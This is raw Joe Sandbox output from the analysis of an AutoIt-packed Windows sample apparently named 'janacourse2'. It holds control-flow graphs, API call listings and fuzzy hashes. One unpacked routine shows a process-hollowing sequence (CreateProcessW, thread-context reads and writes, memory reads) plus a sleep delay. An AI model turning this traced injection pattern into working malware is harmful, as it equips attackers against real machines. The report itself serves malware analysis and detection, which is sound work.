                                                                                                            control_flow_graph 499 14dafe8-14db096 call 14d89e8 502 14db09d-14db0c3 call 14dbef8 CreateFileW 499->502 505 14db0ca-14db0da 502->505 506 14db0c5 502->506 514 14db0dc 505->514 515 14db0e1-14db0fb VirtualAlloc 505->515 507 14db215-14db219 506->507 508 14db25b-14db25e 507->508 509 14db21b-14db21f 507->509 511 14db261-14db268 508->511 512 14db22b-14db22f 509->512 513 14db221-14db224 509->513 516 14db2bd-14db2d2 511->516 517 14db26a-14db275 511->517 518 14db23f-14db243 512->518 519 14db231-14db23b 512->519 513->512 514->507 520 14db0fd 515->520 521 14db102-14db119 ReadFile 515->521 526 14db2d4-14db2df VirtualFree 516->526 527 14db2e2-14db2ea 516->527 524 14db279-14db285 517->524 525 14db277 517->525 528 14db245-14db24f 518->528 529 14db253 518->529 519->518 520->507 522 14db11b 521->522 523 14db120-14db160 VirtualAlloc 521->523 522->507 530 14db167-14db182 call 14dc148 523->530 531 14db162 523->531 532 14db299-14db2a5 524->532 533 14db287-14db297 524->533 525->516 526->527 528->529 529->508 539 14db18d-14db197 530->539 531->507 536 14db2a7-14db2b0 532->536 537 14db2b2-14db2b8 532->537 535 14db2bb 533->535 535->511 536->535 537->535 540 14db199-14db1c8 call 14dc148 539->540 541 14db1ca-14db1de call 14dbf58 539->541 540->539 547 14db1e0 541->547 548 14db1e2-14db1e6 541->548 547->507 549 14db1e8-14db1ec CloseHandle 548->549 550 14db1f2-14db1f6 548->550 549->550 551 14db1f8-14db203 VirtualFree 550->551 552 14db206-14db20f 550->552 551->552 552->502 552->507
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014DB0B9
                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014DB2DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileFreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 204039940-0
                                                                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                            • Instruction ID: 42ebe7f16ee8d61235b1fc2c2457e648efe376ed2ac6055728abf16c767836a8
                                                                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                            • Instruction Fuzzy Hash: E2A10875E00209EBDF14CFA4C8A8BAEBBB5FF49304F20815AE615BB390D7759A41CB54

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 563 fb2c63-fb2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB2C91
                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB2CB2
                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB1CAD,?), ref: 00FB2CC6
                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB1CAD,?), ref: 00FB2CCF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CreateShow
                                                                                                            • String ID: AutoIt v3$edit
                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                            • Opcode ID: 9b652c30a58f513b57dee2ab85593c0ad60f7877e2449ec92202fc697cce22a5
                                                                                                            • Instruction ID: 9eef1ebefd3428ece72a3636da0b4b6219304289dce549b90863c9c8fc02daf1
                                                                                                            • Opcode Fuzzy Hash: 9b652c30a58f513b57dee2ab85593c0ad60f7877e2449ec92202fc697cce22a5
                                                                                                            • Instruction Fuzzy Hash: A8F03AB95443907FEB300713AC4CEBB2EBDEBC6F50B00806EF980A2154C27A0842DBB0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 678 14dad98-14daee2 call 14d89e8 call 14dac88 CreateFileW 685 14daee9-14daef9 678->685 686 14daee4 678->686 689 14daefb 685->689 690 14daf00-14daf1a VirtualAlloc 685->690 687 14daf99-14daf9e 686->687 689->687 691 14daf1c 690->691 692 14daf1e-14daf35 ReadFile 690->692 691->687 693 14daf39-14daf73 call 14dacc8 call 14d9c88 692->693 694 14daf37 692->694 699 14daf8f-14daf97 ExitProcess 693->699 700 14daf75-14daf8a call 14dad18 693->700 694->687 699->687 700->699
                                                                                                            APIs
                                                                                                              • Part of subcall function 014DAC88: Sleep.KERNELBASE(000001F4), ref: 014DAC99
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014DAED8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileSleep
                                                                                                            • String ID: 150Y6ZEWGLQ7JI7HKLYHAOWILQ
                                                                                                            • API String ID: 2694422964-4047189720
                                                                                                            • Opcode ID: adc43201adb653bc1989af4f2424be0b5e75924d0e8ca35fcd8bf9c209c8cf97
                                                                                                            • Instruction ID: d0bce00ad28935c31b7169a02c6a200fe9c6e6ff0df2d0c503af0d0949d385b2
                                                                                                            • Opcode Fuzzy Hash: adc43201adb653bc1989af4f2424be0b5e75924d0e8ca35fcd8bf9c209c8cf97
                                                                                                            • Instruction Fuzzy Hash: 2C619170D04288DAEF11DBB8C858BEEBBB49F15304F144199E2487B2C1C6B94B49CBA6

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 738 fb3b1c-fb3b27 739 fb3b99-fb3b9b 738->739 740 fb3b29-fb3b2e 738->740 741 fb3b8c-fb3b8f 739->741 740->739 742 fb3b30-fb3b48 RegOpenKeyExW 740->742 742->739 743 fb3b4a-fb3b69 RegQueryValueExW 742->743 744 fb3b6b-fb3b76 743->744 745 fb3b80-fb3b8b RegCloseKey 743->745 746 fb3b78-fb3b7a 744->746 747 fb3b90-fb3b97 744->747 745->741 748 fb3b7e 746->748 747->748 748->745
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FB3B0F,SwapMouseButtons,00000004,?), ref: 00FB3B40
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FB3B0F,SwapMouseButtons,00000004,?), ref: 00FB3B61
                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00FB3B0F,SwapMouseButtons,00000004,?), ref: 00FB3B83
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Control Panel\Mouse
                                                                                                            • API String ID: 3677997916-824357125
                                                                                                            • Opcode ID: 1cfe87a2388660b91f32fb4392ed20af733bc1c2f6dc9684dace6ae2700a6c7f
                                                                                                            • Instruction ID: 04be811b27ecdde99211f09479afb64f1152d386757e5b8690442a7fbfafa312
                                                                                                            • Opcode Fuzzy Hash: 1cfe87a2388660b91f32fb4392ed20af733bc1c2f6dc9684dace6ae2700a6c7f
                                                                                                            • Instruction Fuzzy Hash: 26115AB5551208FFDB208FA6DD84AEEB7B8EF41750B108559B801D7118D6319E40AB60

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 749 14d9c88-14d9d28 call 14dc128 * 3 756 14d9d3f 749->756 757 14d9d2a-14d9d34 749->757 758 14d9d46-14d9d4f 756->758 757->756 759 14d9d36-14d9d3d 757->759 760 14d9d56-14da408 758->760 759->758 761 14da41b-14da448 CreateProcessW 760->761 762 14da40a-14da40e 760->762 769 14da44a-14da44d 761->769 770 14da452 761->770 763 14da454-14da481 762->763 764 14da410-14da414 762->764 782 14da48b 763->782 783 14da483-14da486 763->783 765 14da48d-14da4ba 764->765 766 14da416 764->766 768 14da4c4-14da4de Wow64GetThreadContext 765->768 790 14da4bc-14da4bf 765->790 766->768 773 14da4e5-14da500 ReadProcessMemory 768->773 774 14da4e0 768->774 775 14da849-14da84b 769->775 770->768 777 14da507-14da510 773->777 778 14da502 773->778 776 14da7f2-14da7f6 774->776 780 14da7f8-14da7fc 776->780 781 14da847 776->781 785 14da539-14da558 call 14db7a8 777->785 786 14da512-14da521 777->786 778->776 787 14da7fe-14da80a 780->787 788 14da811-14da815 780->788 781->775 782->768 783->775 798 14da55f-14da582 call 14db8e8 785->798 799 14da55a 785->799 786->785 791 14da523-14da532 call 14db6f8 786->791 787->788 793 14da817-14da81a 788->793 794 14da821-14da825 788->794 790->775 791->785 802 14da534 791->802 793->794 800 14da827-14da82a 794->800 801 14da831-14da835 794->801 808 14da5cc-14da5ed call 14db8e8 798->808 809 14da584-14da58b 798->809 799->776 800->801 804 14da837-14da83d call 14db6f8 801->804 805 14da842-14da845 801->805 802->776 804->805 805->775 815 14da5ef 808->815 816 14da5f4-14da612 call 14dc148 808->816 811 14da58d-14da5be call 14db8e8 809->811 812 14da5c7 809->812 819 14da5c5 811->819 820 14da5c0 811->820 812->776 815->776 822 14da61d-14da627 816->822 819->808 820->776 823 14da65d-14da661 822->823 824 14da629-14da65b call 14dc148 822->824 826 14da74c-14da769 call 14db2f8 823->826 827 14da667-14da677 823->827 824->822 835 14da76b 826->835 836 14da770-14da78f Wow64SetThreadContext 826->836 827->826 830 14da67d-14da68d 827->830 830->826 833 14da693-14da6b7 830->833 834 14da6ba-14da6be 833->834 834->826 837 14da6c4-14da6d9 834->837 835->776 838 14da791 836->838 839 14da793-14da79e call 14db628 836->839 840 14da6ed-14da6f1 837->840 838->776 845 14da7a0 839->845 846 14da7a2-14da7a6 839->846 843 14da72f-14da747 840->843 844 14da6f3-14da6ff 840->844 843->834 847 14da72d 844->847 848 14da701-14da72b 844->848 845->776 849 14da7a8-14da7ab 846->849 850 14da7b2-14da7b6 846->850 847->840 848->847 849->850 852 14da7b8-14da7bb 850->852 853 14da7c2-14da7c6 850->853 852->853 854 14da7c8-14da7cb 853->854 855 14da7d2-14da7d6 853->855 854->855 856 14da7d8-14da7de call 14db6f8 855->856 857 14da7e3-14da7ec 855->857 856->857 857->760 857->776
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 014DA443
                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014DA4D9
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014DA4FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 2438371351-0
                                                                                                            • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                                            • Instruction ID: 202a1e3275584adb9dd276083a3afe42e57986a86684b8d4bb83878519fde1e2
                                                                                                            • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                                            • Instruction Fuzzy Hash: EA62FC30A14258DBEB24CFA4C855BDEB776EF58300F1091A9D10DEB3A0E7799E81CB59
                                                                                                            Strings
                                                                                                            • Variable must be of type 'Object'., xrefs: 010032B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                            • API String ID: 0-109567571
                                                                                                            • Opcode ID: cccaacf2bcf9389da1679e848b805ce137597ef8a432b90d9be22ce9f54e795e
                                                                                                            • Instruction ID: e1981b755b64bd48e1bc67addb01278761d643315226220ee4898fbd7d9f6da7
                                                                                                            • Opcode Fuzzy Hash: cccaacf2bcf9389da1679e848b805ce137597ef8a432b90d9be22ce9f54e795e
                                                                                                            • Instruction Fuzzy Hash: F5C26575E00215CFDB25CF59C881BEDBBF1BB08310F288169E986AB291D735AD41EF91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1369 fb3923-fb3939 1370 fb393f-fb3954 call fb6270 1369->1370 1371 fb3a13-fb3a17 1369->1371 1374 fb395a-fb3976 call fb6b57 1370->1374 1375 ff3393-ff33a2 LoadStringW 1370->1375 1381 ff33c9-ff33e5 call fb6350 call fb3fcf 1374->1381 1382 fb397c-fb3980 1374->1382 1377 ff33ad-ff33b6 1375->1377 1379 ff33bc-ff33c4 call fba8c7 1377->1379 1380 fb3994-fb3a0e call fd2340 call fb3a18 call fd4983 Shell_NotifyIconW call fb988f 1377->1380 1379->1380 1380->1371 1381->1380 1395 ff33eb-ff3409 call fb33c6 call fb3fcf call fb33c6 1381->1395 1382->1377 1386 fb3986-fb398f call fb6350 1382->1386 1386->1380 1395->1380
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FF33A2
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB3A04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                            • String ID: Line:
                                                                                                            • API String ID: 2289894680-1585850449
                                                                                                            • Opcode ID: 8b2f9333e46c55b3e55e57b178362774547c038f635b8f09e44adf6c8ae1350d
                                                                                                            • Instruction ID: 6654dbb603b4d90e8a5defa777c19e7bba614eec129ca972a1b7ebcc2953e8c8
                                                                                                            • Opcode Fuzzy Hash: 8b2f9333e46c55b3e55e57b178362774547c038f635b8f09e44adf6c8ae1350d
                                                                                                            • Instruction Fuzzy Hash: D631C071848304AFD725EB21DC45BEFB7E8AF40720F14452AF5D982185EF789A49EBC2
                                                                                                            APIs
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00FD0668
                                                                                                              • Part of subcall function 00FD32A4: RaiseException.KERNEL32(?,?,?,00FD068A,?,01081444,?,?,?,?,?,?,00FD068A,00FB1129,01078738,00FB1129), ref: 00FD3304
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00FD0685
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                            • String ID: Unknown exception
                                                                                                            • API String ID: 3476068407-410509341
                                                                                                            • Opcode ID: f65bcbc4c885394cf2eb6396a8f97332224b8c233552ce993fef78d61fb09512
                                                                                                            • Instruction ID: 36285d33cfe3879bed652e2163e5be638c66d7f92c0e407da3e3769c28c03b45
                                                                                                            • Opcode Fuzzy Hash: f65bcbc4c885394cf2eb6396a8f97332224b8c233552ce993fef78d61fb09512
                                                                                                            • Instruction Fuzzy Hash: 91F02834C0020E73CB00B664EC4AF5DB76F6E00320F584037B91586691EF34DA29E580
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 010382F5
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 010382FC
                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 010384DD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 146820519-0
                                                                                                            • Opcode ID: 997b864efdc321d591180432ab998919b88aa782605cbd9be54df68206f75ea5
                                                                                                            • Instruction ID: 817f4a1561acdb12579ec4a990b89c3ea5d3b59996248d630a1002d7f904accc
                                                                                                            • Opcode Fuzzy Hash: 997b864efdc321d591180432ab998919b88aa782605cbd9be54df68206f75ea5
                                                                                                            • Instruction Fuzzy Hash: 77126B719083019FD754DF28C484B6ABBE5BFC4314F04899EF9898B252DB35E945CF92
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB1BF4
                                                                                                              • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB1BFC
                                                                                                              • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB1C07
                                                                                                              • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB1C12
                                                                                                              • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB1C1A
                                                                                                              • Part of subcall function 00FB1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB1C22
                                                                                                              • Part of subcall function 00FB1B4A: RegisterWindowMessageW.USER32(00000004,?,00FB12C4), ref: 00FB1BA2
                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FB136A
                                                                                                            • OleInitialize.OLE32 ref: 00FB1388
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00FF24AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1986988660-0
                                                                                                            • Opcode ID: 12e9e63889e0d44b5db9144ade24756cff86dee602a52429492021c1b2f00ece
                                                                                                            • Instruction ID: 4acd64185be5f98dd889e5059016266c154f4862c332e709b64d0b742039d089
                                                                                                            • Opcode Fuzzy Hash: 12e9e63889e0d44b5db9144ade24756cff86dee602a52429492021c1b2f00ece
                                                                                                            • Instruction Fuzzy Hash: 9B71BCB491D200DFC3A4EF7AE9566993AE0BF48344758822AD0CAC7349EB3A4403DF64
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,00FE85CC,?,01078CC8,0000000C), ref: 00FE8704
                                                                                                            • GetLastError.KERNEL32(?,00FE85CC,?,01078CC8,0000000C), ref: 00FE870E
                                                                                                            • __dosmaperr.LIBCMT ref: 00FE8739
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                            • String ID:
                                                                                                            • API String ID: 2583163307-0
                                                                                                            • Opcode ID: 783ab2411e2fd6be9bf16170863f722d3459e235338bf653bd40801df04d6f16
                                                                                                            • Instruction ID: 2c7a6fad6f749b1421dc1127bc27971ac8479d564b0c0252f2dac04160d4f8ca
                                                                                                            • Opcode Fuzzy Hash: 783ab2411e2fd6be9bf16170863f722d3459e235338bf653bd40801df04d6f16
                                                                                                            • Instruction Fuzzy Hash: 70012B33E056E02AD7347236A945B7E774A4B81BF8F390119F81C9B1D3DEA98C82B251
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00FC17F6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Init_thread_footer
                                                                                                            • String ID: CALL
                                                                                                            • API String ID: 1385522511-4196123274
                                                                                                            • Opcode ID: 6bbc5ce0af5a345a9b7ac7eb8dae2fc3ddddaca6a0a0b2e42415b170c0edb84c
                                                                                                            • Instruction ID: 39837e2781d8f52cd3dd4ce7cccd64a073c5035d090c8cf5b5e9ae0352dcbd08
                                                                                                            • Opcode Fuzzy Hash: 6bbc5ce0af5a345a9b7ac7eb8dae2fc3ddddaca6a0a0b2e42415b170c0edb84c
                                                                                                            • Instruction Fuzzy Hash: B4228E705082029FD714DF14C981F2ABBF2BF86314F18895DF4968B392D736E865DB92
                                                                                                            APIs
                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00FF2C8C
                                                                                                              • Part of subcall function 00FB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB3A97,?,?,00FB2E7F,?,?,?,00000000), ref: 00FB3AC2
                                                                                                              • Part of subcall function 00FB2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB2DC4
                                                                                                            Strings
                                                                                                            Memory Dump Source
